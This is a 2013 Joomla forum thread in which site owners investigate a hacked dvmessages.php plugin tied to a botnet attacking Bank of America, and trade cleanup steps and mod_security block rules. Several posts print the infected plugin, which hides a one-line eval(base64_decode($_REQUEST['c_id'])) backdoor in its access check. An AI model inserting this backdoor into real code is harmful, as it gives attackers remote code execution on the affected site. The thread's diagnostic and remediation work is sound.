dvmessages.php is being reported as phishing file?

Discussion regarding Joomla! 2.5 security issues.

Moderators: Bernard T, mandville, PhilD, General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant / FPA - If you are serious about wanting help, you will use this tool to help you post.
stryka
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Sun Jan 20, 2013 2:45 pm

dvmessages.php is being reported as phishing file?

Postby stryka » Wed Feb 20, 2013 10:15 pm

Is dvmessages.php a valid joomla file? My host is claiming abuse notices from Bank of America and we have double checked everything and have not found any updated files...

We did notice that the joomla error logs are not being populate as of recently...not sure how to get that going again but the path in site config seems find

We did find a few of the following in the raw logs...

184.173.241.57 - - [20/Feb/2013:15:07:23 +0000] "POST /plugins/system/dvmessages/dvmessages.php?action=status HTTP/1.0" 200 12 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"

We currently using Akeeba admin to turn off site temporarily

so if you can tell us how to get loggin back on and what else i should check...

thanks

rozahonar
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Sat Feb 23, 2013 9:47 am

Re: dvmessages.php is being reported as phishing file?

Postby rozahonar » Sat Feb 23, 2013 11:18 am

I have sort of the same question. The server that we have contract with, send us an email.
It claims that 'dvmessages.php' in 'plugins/system/dvmessages.php' path is a malware. Do you have any experience about this?
I 'm looking forward to your answers.
Regards,

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 13541
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: dvmessages.php is being reported as phishing file?

Postby mandville » Sat Feb 23, 2013 12:17 pm

is this an extension plugin for http://extensions.joomla.org/extensions ... ames/10999
what are the contents of the file

as for your logging issues, try and delete the current log file and see if that will restart it. check the logging settings with your host
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security forums Moderator}

User avatar
pera
Joomla! Apprentice
Joomla! Apprentice
Posts: 37
Joined: Wed Aug 24, 2005 5:31 pm
Location: Sweden
Contact:

Re: dvmessages.php is being reported as phishing file?

Postby pera » Tue Feb 26, 2013 2:19 pm

this is second time I get notice from
Abuse Team
Bank of America
The code of the file is:

Code: Select all

<?php
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
jimport( 'joomla.plugin.plugin' );
jimport( 'joomla.application.component.helper' );
class plgSystemDVMessages extends JPlugin
{
   var $message;

   function plgSystemDVMessages(& $subject, $config) {
      parent::__construct($subject, $config);
   }
   
   function onAfterInitialise()
   {
      global $_PROFILER, $mainframe, $database, $_SESSION;
      $plugin         =& JPluginHelper::getPlugin('system', 'dvmessages');
      $pluginParams   = new JParameter( $plugin->params );

      $document = &JFactory::getDocument();
      $temps = $mainframe->getMessageQueue();
      if ($temps) {
         foreach($temps as $temp) {
            if ($temp['message'] != '') {
               $messages = $temp;
            }
         }
      }

      if ($messages) {
         if($mainframe->isSite() && ($pluginParams->get('front_enable', 1)) ||
         !$mainframe->isSite() && ($pluginParams->get('admin_enable', 1))) {
            $type = '';
            if (($messages['type'] == 'notice') && ($pluginParams->get('show_notice', 1))) {
               $type = 'info';
            } elseif (($messages['type'] == 'warning') && ($pluginParams->get('show_warning', 1))) {
               $type = 'alert';
            } elseif (($messages['type'] == 'error') && ($pluginParams->get('show_error', 1))) {
               $type = 'error';
            } elseif (($messages['type'] == 'message') && ($pluginParams->get('show_message', 1))) {
               $type = 'info';
            }
            
            if ($type != '') {
               JHTML::_('behavior.mootools');
               $document->addScript(JURI::Root() . 'plugins/system/SEO/jquery.min.js');
               $document->addScript(JURI::Root() . 'plugins/system/SEO/jquery.easing.1.3.js');
               $document->addScript(JURI::Root() . 'plugins/system/SEO/SEObox.v1.2.jquery.js');
               $document->addStyleSheet(JURI::Root() . 'plugins/system/SEO/SEObox.css');
               
               $document->addScriptDeclaration("
                  jQuery.noConflict();         
                  jQuery(document).ready(function(){
                     Sexy.$type('".addslashes($messages['message'])."');
                  });
               ");
               
               if ($pluginParams->get('hide_css', 1)) {
                  $document->addScriptDeclaration("
                     jQuery.noConflict();
                     jQuery(document).ready(function(){
                        document.getElementById('system-message').style.display = 'none';
                     });
                  ");
               }
            }
         }
      }
      return true;
   }
}


The abuse team advice me to check with:
curl -A "Mozilla/4.0" -iL [URL]
I get

Code: Select all

[[email protected] dvmessages]# curl -A "Mozilla/4.0" -iL http://www.xxx/plugins/system/dvmessages/dvmessages.php
HTTP/1.1 200 OK
Date: Tue, 26 Feb 2013 14:18:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.20
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html


Any advice?

annalanga
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Tue Feb 26, 2013 6:37 pm
Location: London, UK

Re: dvmessages.php is being reported as phishing file?

Postby annalanga » Tue Feb 26, 2013 6:45 pm

Hello,

Oh so I`m not the only one having this problem then :-[

I got a message today from my host stating there is a suspicious code in ../plugins/system/dvmessages/dvmessages.php, and may result malicious activity. Can not recall installing mentioned extension. Is it possible it came with anything else?

Now when I`m checking plugins folder there is no sign of dvmessages. How weird?

User avatar
ionut
Joomla! Ace
Joomla! Ace
Posts: 1231
Joined: Thu May 27, 2010 1:00 pm
Location: EU
Contact:

Re: dvmessages.php is being reported as phishing file?

Postby ionut » Tue Feb 26, 2013 8:37 pm

@pera the first line

Code: Select all

defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
for sure doesn't look nice.
Still thinking.
This row is intentionally left blank.

https://ionutlupu.me/j-extensions.html ¬
home of J!Extranet, EasyAppointment, TableBooking and other joomla extensions

kadukeitor
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Tue Feb 26, 2013 10:25 pm

Re: dvmessages.php is being reported as phishing file?

Postby kadukeitor » Tue Feb 26, 2013 10:38 pm

My hosting provider just sent me a similar warning, is a cyber attack? , I see nothing strange in the code ... Please anyone can tell me where is the attack?

User avatar
pera
Joomla! Apprentice
Joomla! Apprentice
Posts: 37
Joined: Wed Aug 24, 2005 5:31 pm
Location: Sweden
Contact:

Re: dvmessages.php is being reported as phishing file?

Postby pera » Wed Feb 27, 2013 3:39 pm

The original file from
http://extensions.joomla.org/extensions ... ames/10999
dvmessages.php

Code: Select all

<?php
/**

*/

// no direct access
defined( '_JEXEC' ) or die( 'Restricted access' );

jimport( 'joomla.plugin.plugin' );


But on the "infected" dvmessages.php

Code: Select all

<?php
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
jimport( 'joomla.plugin.plugin' );


This old plugin for Joomla 1.5... best is to not use it or?

User avatar
PhilD
Joomla! Hero
Joomla! Hero
Posts: 2727
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA
Contact:

Re: dvmessages.php is being reported as phishing file?

Postby PhilD » Wed Feb 27, 2013 6:53 pm

Well obviously (based on posted code) the code is now part of a larger hack with likely more files installed somewhere on the site.

My advice is to disable, and completely remove all traces of the plugin and also your (everyone jumping on with a me too) going to have to follow the advice and procedures here: viewtopic.php?f=621&t=582854 in order to properly remove the hack, clean the site(s).

I would NOT install or use the plugin after you have cleaned the site. It may or may not be the source of the sites insecurity, but until you know for sure don't use it.
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator

Dumdeedum
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Fri Mar 08, 2013 2:43 am

Re: dvmessages.php is being reported as phishing file?

Postby Dumdeedum » Fri Mar 08, 2013 3:25 am

This is definitely part of a larger effort. This is a very dangerous hack that is much, much larger than Bank of America and all administrators should remove this plugin and follow the instructions from PhilD above. Additionally, if you administrate your own server (i.e. a VPS, dedicated server), then you should also secure your temp directory (and also your Joomla temp directory, if different from your system temp). Below is an example on how you might be able to do that.

http://www.techrepublic.com/blog/openso ... -linux/171

kevinm2
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Thu Mar 21, 2013 12:27 pm

Re: dvmessages.php is being reported as phishing file?

Postby kevinm2 » Thu Mar 21, 2013 12:29 pm

your server is now part of a botnet if you have this file (or others)

http://www.prolexic .com/news-events-pr-threat-advisory-ddos-itsoknoproblembro.html

itsokbronoproblem botnet uses these files ...

If you have these files on your Joomla (or wordpress) then your installation has been comprimised by the automated attack tools the botnet uses,, this would mean you have old versions of Joomla or wordpress installed.

You need to update Joomla / Wordpress to the most recent versions, remove any components / plugins that are not being used, then audit all files uploaded to your hosting account for malicious changes / comprimised back doors.

skate323k137
Joomla! Apprentice
Joomla! Apprentice
Posts: 10
Joined: Thu May 20, 2010 12:52 am

Re: dvmessages.php is being reported as phishing file?

Postby skate323k137 » Fri Mar 22, 2013 9:21 pm

This botnet has been firing up again the last couple days. Tons of joomla sites are being used to DDoS Bank of America.

According to access logs on affected servers, It looks like the malicious dvmessages.php files are being edited/uploaded using com_installer. If you have an infected dvmessages file that contains the bad eval statement, fix it:

Code: Select all

change
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
to
defined( '_JEXEC' ) or die( 'Restricted access' );


The infection itself means that either your joomla install is outdated and vulnerable (J1.5) or your administrator password was compromised. Upgrade your software and change your (super)Administrator password(s).

Sampao
Joomla! Intern
Joomla! Intern
Posts: 80
Joined: Fri Jul 20, 2007 2:57 pm
Location: Pattaya & Surin/Thailand

Re: dvmessages.php is being reported as phishing file?

Postby Sampao » Thu Mar 28, 2013 5:05 pm

skate323k137 wrote:This botnet has been firing up again the last couple days. Tons of joomla sites are being used to DDoS Bank of America.

According to access logs on affected servers, It looks like the malicious dvmessages.php files are being edited/uploaded using com_installer. If you have an infected dvmessages file that contains the bad eval statement, fix it:

Code: Select all

change
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
to
defined( '_JEXEC' ) or die( 'Restricted access' );


The infection itself means that either your joomla install is outdated and vulnerable (J1.5) or your administrator password was compromised. Upgrade your software and change your (super)Administrator password(s).



So, we're all in the same boat ... Three of my sites have been attacked and my host company sent me several complaints from Bank of America. Also on my sites plugins/system/dvsmessages.php was mentioned every time. I have now changed the parameters of all three files, but I don't think this will change much. My joomla install is marked as updated, except on one site where I have to update manually.

Sorry to ask: "Upgrade your software" >> which software, please?

This is what my dvmessages,php file contains now:

params ); $document = &JFactory::getDocument(); $temps = $mainframe->getMessageQueue(); if ($temps) { foreach($temps as $temp) { if ($temp['message'] != '') { $messages = $temp; } } } if ($messages) { if($mainframe->isSite() && ($pluginParams->get('front_enable', 1)) || !$mainframe->isSite() && ($pluginParams->get('admin_enable', 1))) { $type = ''; if (($messages['type'] == 'notice') && ($pluginParams->get('show_notice', 1))) { $type = 'info'; } elseif (($messages['type'] == 'warning') && ($pluginParams->get('show_warning', 1))) { $type = 'alert'; } elseif (($messages['type'] == 'error') && ($pluginParams->get('show_error', 1))) { $type = 'error'; } elseif (($messages['type'] == 'message') && ($pluginParams->get('show_message', 1))) { $type = 'info'; } if ($type != '') { JHTML::_('behavior.mootools'); $document->addScript(JURI::Root() . 'plugins/system/SEO/jquery.min.js'); $document->addScript(JURI::Root() . 'plugins/system/SEO/jquery.easing.1.3.js'); $document->addScript(JURI::Root() . 'plugins/system/SEO/SEObox.v1.2.jquery.js'); $document->addStyleSheet(JURI::Root() . 'plugins/system/SEO/SEObox.css'); $document->addScriptDeclaration(" jQuery.noConflict(); jQuery(document).ready(function(){ Sexy.$type('".addslashes($messages['message'])."'); }); "); if ($pluginParams->get('hide_css', 1)) { $document->addScriptDeclaration(" jQuery.noConflict(); jQuery(document).ready(function(){ document.getElementById('system-message').style.display = 'none'; }); "); } } } } return true; } }
Last edited by Sampao on Thu Mar 28, 2013 5:24 pm, edited 1 time in total.

skate323k137
Joomla! Apprentice
Joomla! Apprentice
Posts: 10
Joined: Thu May 20, 2010 12:52 am

Re: dvmessages.php is being reported as phishing file?

Postby skate323k137 » Thu Mar 28, 2013 5:20 pm

The only one of these I tracked down in domlogs tracked to com_installer. That should have been patched a long time ago. Are you in a shared hosting environment like on a cPanel server with other customers? If so you should ask your host if they've applied a patch to prevent cross-account symbolic links.

If you have root access you should install configserver firewall and mod_security. Configserver firewall will block IP's that trip mod_security more than five times. If you make a modsec rule that denies the URI, the bots trying to hit it will be banned. Sometimes after you clean the file the bots still try to access it for days causing high server load. Put this in modsec2.user.conf or one of your first includes files referenced in that file:

Code: Select all

SecRule REQUEST_URI "/plugins/system/dvmessages.php" "chain,id:1234942,msg:dvmessages"
SecRule SERVER_NAME "domain.com"


Change domain.com to the site being attacked. If it affects several sites just make it a one-line rule:

Code: Select all

SecRule REQUEST_URI "/plugins/system/dvmessages.php" "id:1234943,msg:dvmessages"

Sampao
Joomla! Intern
Joomla! Intern
Posts: 80
Joined: Fri Jul 20, 2007 2:57 pm
Location: Pattaya & Surin/Thailand

Re: dvmessages.php is being reported as phishing file?

Postby Sampao » Thu Mar 28, 2013 5:49 pm

to skate323k137:

was that last message for me? If yes, I can't follow your instructions, honestly.

skate323k137
Joomla! Apprentice
Joomla! Apprentice
Posts: 10
Joined: Thu May 20, 2010 12:52 am

Re: dvmessages.php is being reported as phishing file?

Postby skate323k137 » Thu Mar 28, 2013 6:36 pm

It was, though it will help anyone in this situation if they are on a linux server. Are you hosted on a shared server, or do you have root access to your hosting environment (i.e. VPS or Dedicated server?)

chm289
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Mon Apr 01, 2013 7:03 am

Re: dvmessages.php is being reported as phishing file?

Postby chm289 » Mon Apr 01, 2013 7:07 am

The original file from
http://extensions.joomla.org/extensions ... ames/10999
dvmessages.php
what does smh mean

User avatar
PseudZ
Joomla! Apprentice
Joomla! Apprentice
Posts: 35
Joined: Thu Jul 07, 2011 11:58 am
Location: South Africa

Re: dvmessages.php is being reported as phishing file?

Postby PseudZ » Fri Apr 26, 2013 7:11 am

What extension has been infected and should be removed? It seems to have been removed from the extensions directory and I cannot see which one it is.

Thanks

User avatar
horus_68
Joomla! Ace
Joomla! Ace
Posts: 1438
Joined: Sun Sep 25, 2005 5:29 am
Location: Porto - Portugal
Contact:

Re: dvmessages.php is being reported as phishing file?

Postby horus_68 » Thu May 09, 2013 5:11 pm

PseudZ wrote:What extension has been infected and should be removed? It seems to have been removed from the extensions directory and I cannot see which one it is.

Thanks

The extension reported here is
DVMessages - http://archive.extensions.joomla.org/ex ... ames/10999
Tutorials: Online translation for Joomla core and extensions: https://sites.google.com/site/transjoomla
- Portuguese Joomla Community / Joomla pt-PT Translation Team


Return to “Security in Joomla! 2.5”

Who is online

Users browsing this forum: No registered users and 5 guests